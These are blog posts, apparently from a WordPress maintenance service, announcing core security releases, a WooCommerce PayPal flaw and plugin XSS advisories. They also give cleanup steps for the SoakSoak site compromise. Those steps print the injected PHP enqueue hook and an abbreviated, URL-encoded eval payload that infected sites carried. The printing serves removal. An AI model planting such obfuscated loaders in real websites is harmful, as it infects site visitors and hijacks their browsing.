New Security Release: 4.2.4

Today, WordPress 4.2.4 was released as an important security fix. This update comes just one week after the release of WordPress 4.2.3.

4.2.3 caused quite a few issues with many sites as it changed the way WordPress uses shortcodes. This caused many sites to break their formatting when they relied of shortcodes to display content. The release team did not give a lot of warning to this change, although it was important to close the security hole with cross-site scripting.

This update, 4.2.4 supposedly fixed the issue sites were having with 4.2.3, so many plugin and theme authors will be happy. This update also addresses more issues with cross-site scripting as well as a SQL injection vulnerability.

You should update your site right away and always remember to backup your site before updating!

Read more here: http://wordpress.org/news/2015/08/wordpress-4-2-4-security-and-maintenance-release/

Important WordPress Security Release Today: 4.2.3

WordPress 4.2.3 was released today as an important security patch. There will not be any visual changes in this update (as with all other incremental WordPress updates), but it is extremely important to update to secure your site.

Specifically, the update addresses:

a cross-site scripting vulnerability, which could allow users with the Contributor or Author role to compromise a site.

Read more about it here.

All wpONcall members are already updated. Have you updated yet?

Sucurity Alert: WooCommerce Vulnerability

Today, Sucuri announced a vulnerability in WooCommerce that has been patched in the most recent version. If you are using WooCommerce to power your WordPress e-commerce site, you need to update right away.

The vulnerability is quite serious and is related to a PayPal setting in WooCommerce. If you use PayPal as a payment gateway in WooCommerce, you are most likely vulnerable.

All wpONcall members have already been updated!

Update Your Plugins – XSS Vulnerability

Today, Sucuri announced a major security advisory for a few widely used WordPress plugins. The warning has to do with “Cross-site Scripting (XSS)”, which is used in many popular plugins. All plugins affected by XSS should be updated immediately to patch the vulnerability. The initial list of plugins affected are:

Even Jetpack, a WordPress official plugin is vulnerable. All members of wpONcall are already updated and safe!

 

Massive WordPress Security Breach: SoakSoak

What Is It?

Over the weekend over 11,000 WordPress websites were blacklisted by Google because they were affected by the SoakSoak vulnerability. It is estimated that over 100,000 WordPress sites were compromised by the hack. Websites affected are redirecting users to the Soaksoak domain name. You will see a page similar to this if you have been infected:

soaksoak

What Can You Do to Protect Your Site?

It is not yet clear exactly where the vulnerability is being exploited, but it could be related to the Revolution Slider vulnerability we highlighted a few months ago. The best protection you can have is a completely updated WordPress core, updated plugins and secure backups of your site so you can fix the issue. You may also want to look into a service such as Sucuri, which can add a firewall to protect your site.

How Do I Fix It?

If you have been infected, you can do one of two things:

  1. Restore your website from a clean backup that has not been infected. This will erase the code that was inserted into your site causing the issue.
  2. If you do not have a backup available, you can manually clean the two infected files, which are part of the WordPress core:

1. wp-includes/template-loader.php
Remove this block of code:

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

2. wp-includes/js/swobject.js
Remove this block of code:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Once removed, you will want to login to your Google Webmaster Tools and request your site to be reviewed and de-blacklisted.

If you are a wpONcall client, we would be taking care of this for you! Let us know if you have any questions.